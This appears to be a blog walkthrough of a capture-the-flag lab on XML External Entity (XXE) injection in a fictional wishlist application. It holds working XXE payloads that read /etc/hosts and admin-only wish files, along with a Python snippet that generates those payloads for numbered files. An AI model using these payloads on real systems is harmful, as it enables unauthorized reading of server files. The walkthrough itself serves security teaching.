Day 5: Exploring XML External Entity (XXE) Vulnerabilities in Web Applications

In today's blog post, we’ll dive into a critical vulnerability that was overlooked during development, XML External Entity (XXE) injection, and explore how to exploit it to assess the application's security. We’ll walk through what the vulnerability is, how it works, and how to identify and exploit it using Burp Suite.

Understanding the Basics of XML and XXE

What is XML? XML (Extensible Markup Language) is a widely used method to transport and store data in a structured format. Think of XML as a digital filing cabinet, with data organized in "folders" (tags) that define the content. For example:

<people>
   <name>Glitch</name>
   <address>Wareville</address>
   <email>glitch@wareville.com</email>
   <phone>111000</phone>
</people>

In this XML document, tags like <name>, <address>, and <phone> store personal data about Glitch. The structure is easily shareable and customizable, making it popular in many web applications.
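
To make the filing-cabinet picture concrete, here is a minimal Python sketch that reads the document above with the standard-library xml.etree.ElementTree module and collects each tag and its text into a dictionary. The variable names are illustrative and are not part of the Wareville application.

```python
import xml.etree.ElementTree as ET

# The sample document from above, embedded as a string.
PEOPLE_XML = """<people>
   <name>Glitch</name>
   <address>Wareville</address>
   <email>glitch@wareville.com</email>
   <phone>111000</phone>
</people>"""

root = ET.fromstring(PEOPLE_XML)

# Each child element is one "folder": its tag is the label, its text the content.
record = {child.tag: child.text for child in root}

for tag, text in record.items():
    print(f"{tag}: {text}")
```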

What is an XML External Entity (XXE)? XXE is an attack against applications whose XML parser resolves external entities, which are named placeholders declared in the document that point at a resource outside it. When a vulnerable web application parses attacker-controlled XML, the attacker can declare entities that point to sensitive files or resources, such as /etc/passwd, and have their contents returned in the response, exposing confidential data and opening the door to further exploitation.
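
Entities are easiest to understand by looking at a harmless internal one first. The sketch below is an illustration only: the document and the entity name town are made up for this example. It declares an entity inside the DOCTYPE and lets Python's standard-library parser expand the reference. An external entity uses the same reference syntax, but its value comes from a file or URL instead of a literal string.

```python
import xml.etree.ElementTree as ET

# "town" is an internal entity: its replacement text is written in the DOCTYPE itself.
DOC = """<!DOCTYPE note [<!ENTITY town "Wareville">]>
<note>Greetings from &town;!</note>"""

note = ET.fromstring(DOC)

# The parser has already swapped &town; for its declared value.
print(note.text)
```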

The XXE Vulnerability in Wareville’s Wishlist Application

The platform we’re testing allows users to make holiday wishes by adding products to their wishlist, and the system stores these requests in a series of files (e.g., wish_1.txt). However, in the rush to launch, the development team overlooked critical security testing, including how the XML parser handles external entities.

Intercepting Requests with Burp Suite

Before exploiting the vulnerability, we need to intercept the traffic between our browser and the web application. We’ll use Burp Suite, a web security testing toolkit whose intercepting proxy lets us capture and manipulate requests.

Configure Burp Suite Proxy: First, configure Burp Suite’s proxy to intercept requests. This allows us to inspect and modify the XML payload sent to the application.
Browse the Application: We start by browsing the product page (/product.php) and adding an item to our wishlist. This triggers an AJAX call to wishlist.php with XML data that contains product details.
Inspect the Request: Using Burp Suite’s HTTP history feature, we can see the XML request that the application sends to the server. It’s an XML structure like this:
```
 <wishlist>
    <user_id>1</user_id>
    <item>
       <product_id>1</product_id>
    </item>
 </wishlist>
```
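
For readers who prefer to reproduce the captured request in a script, the following is a rough sketch using only Python's standard library. The host name wareville.example and the Content-Type header are assumptions, since the post only tells us that the XML is sent to wishlist.php. The request object is built but deliberately not sent.

```python
import urllib.request

# Hypothetical host; only the wishlist.php endpoint comes from the walkthrough.
TARGET = "http://wareville.example/wishlist.php"


def build_wishlist_request(user_id, product_id):
    """Build (but do not send) a POST request carrying the wishlist XML."""
    body = (
        "<wishlist>\n"
        f"   <user_id>{user_id}</user_id>\n"
        "   <item>\n"
        f"      <product_id>{product_id}</product_id>\n"
        "   </item>\n"
        "</wishlist>"
    )
    return urllib.request.Request(
        TARGET,
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},  # assumed header value
        method="POST",
    )


request = build_wishlist_request(1, 1)
print(request.get_method(), request.full_url)
print(request.data.decode("utf-8"))
```

Passing the object to urllib.request.urlopen would send it; that step is left out here so the sketch can be run without a target.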

The vulnerability lies in how the server processes this XML. The PHP code on the server calls simplexml_load_string with the LIBXML_NOENT option. Despite its name, this flag tells the underlying libxml2 parser to substitute entities, including external ones, with their values. As a result, an attacker can inject external entity references into the XML and read sensitive files from the server.
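
For contrast, it helps to see what a parser does when it is not asked to substitute external entities. The sketch below is not the Wareville code. It uses Python's standard-library xml.etree.ElementTree, which does not expand external entities and raises a ParseError when it meets a reference to one. The helper name try_parse and the sample document are illustrative.

```python
import xml.etree.ElementTree as ET

# A document that declares an external entity and then references it.
DOC_WITH_EXTERNAL_ENTITY = """<!DOCTYPE foo [<!ENTITY leak SYSTEM "/etc/passwd">]>
<wishlist><user_id>&leak;</user_id></wishlist>"""


def try_parse(xml_text):
    """Return a short description of how the parser handled the document."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        # ElementTree never opens the file; it refuses the unresolved reference.
        return f"rejected: {exc}"
    return "parsed: " + ET.tostring(root, encoding="unicode")


outcome = try_parse(DOC_WITH_EXTERNAL_ENTITY)
print(outcome)
```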

Crafting the Payload

Now that we understand how the system works, let’s craft an XML payload that exploits this vulnerability. We modify the XML request to declare an external entity that points to /etc/hosts, a file that exists on most Unix-like servers and that the application should never return to a user, which makes it a convenient proof of concept. The payload looks like this:

<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts">]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>

Here’s what happens:

The <!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts">]> declaration tells the XML parser to load the contents of /etc/hosts when it encounters &payload;.
When the XML is processed by the server, it will replace &payload; with the contents of the /etc/hosts file.
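
The substitution described above can be pictured with a toy model. The sketch below is not a real XML parser and is not how libxml2 works internally. It only mimics the visible effect with regular expressions, and it reads from a made-up in-memory dictionary (FAKE_FILES) rather than from disk. All names in it are hypothetical.

```python
import re

# Matches declarations of the form <!ENTITY name SYSTEM "path">.
ENTITY_DECL = re.compile(r'<!ENTITY\s+(\w+)\s+SYSTEM\s+"([^"]*)"\s*>')

# Stand-in for the server's filesystem; the content is invented for the demo.
FAKE_FILES = {"/etc/hosts": "127.0.0.1 localhost"}

PAYLOAD = """<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY payload SYSTEM "/etc/hosts">]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>"""


def simulate_substitution(xml_text, fake_files):
    """Replace each &name; reference with the content its entity points to."""
    entities = dict(ENTITY_DECL.findall(xml_text))  # name -> declared path

    def replace(match):
        name = match.group(1)
        if name not in entities:
            return match.group(0)  # leave unknown references untouched
        return fake_files.get(entities[name], "")

    return re.sub(r"&(\w+);", replace, xml_text)


expanded = simulate_substitution(PAYLOAD, FAKE_FILES)
print(expanded)
```

In the printed result, the product_id element holds the file content instead of the &payload; reference, which is the same effect the vulnerable server produces with the real file.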

Exploiting the Vulnerability

To exploit the vulnerability, we use Burp Suite’s Repeater tool, which lets us edit a captured request and resend it as many times as needed while observing the server’s response. When we send the request with the payload, the application processes the malicious XML, and the response includes the contents of the /etc/hosts file, demonstrating that the system is vulnerable to XXE.

Accessing Sensitive Data: The Admin-Only Wish Pages

The real excitement comes when we apply the XXE vulnerability to gain access to restricted pages. The application restricts access to certain wish pages, such as /wishes/wish_1.txt, to admins only. We can use our XXE payload to read these files and access sensitive data.

To accomplish this, we build a payload that references the likely path of the wishes files. For example, we might try:

<!DOCTYPE foo [<!ENTITY payload SYSTEM "file:///var/www/html/wishes/wish_1.txt">]>
<wishlist>
  <user_id>1</user_id>
  <item>
    <product_id>&payload;</product_id>
  </item>
</wishlist>

By sending this payload, we can read the contents of the wish_1.txt file, potentially exposing sensitive data about other users' wishes. This is a clear demonstration of how XXE can be exploited to bypass restrictions and leak sensitive information.
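
Since the wishes are stored as a series of numbered files, the same payload can be generated for several candidates. The sketch below assumes the files follow the wish_N.txt pattern under /var/www/html/wishes, as in the example above. Whether any file beyond wish_1.txt exists is a guess, and the function name build_wish_payload is illustrative. Each generated body can be pasted into Repeater.

```python
def build_wish_payload(index, base="file:///var/www/html/wishes"):
    """Return an XXE request body that points the entity at wish_<index>.txt."""
    entity_uri = f"{base}/wish_{index}.txt"
    return (
        f'<!DOCTYPE foo [<!ENTITY payload SYSTEM "{entity_uri}">]>\n'
        "<wishlist>\n"
        "  <user_id>1</user_id>\n"
        "  <item>\n"
        "    <product_id>&payload;</product_id>\n"
        "  </item>\n"
        "</wishlist>"
    )


# Candidate payloads for the first three wish files (the range is an assumption).
payloads = [build_wish_payload(i) for i in range(1, 4)]

for body in payloads:
    print(body)
    print("-" * 40)
```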

Conclusion

As penetration testers, it’s crucial to identify and exploit vulnerabilities like XXE to help developers secure their applications. In the case of Wareville, the XXE vulnerability could lead to serious consequences, including unauthorized access to sensitive information and potential server compromise.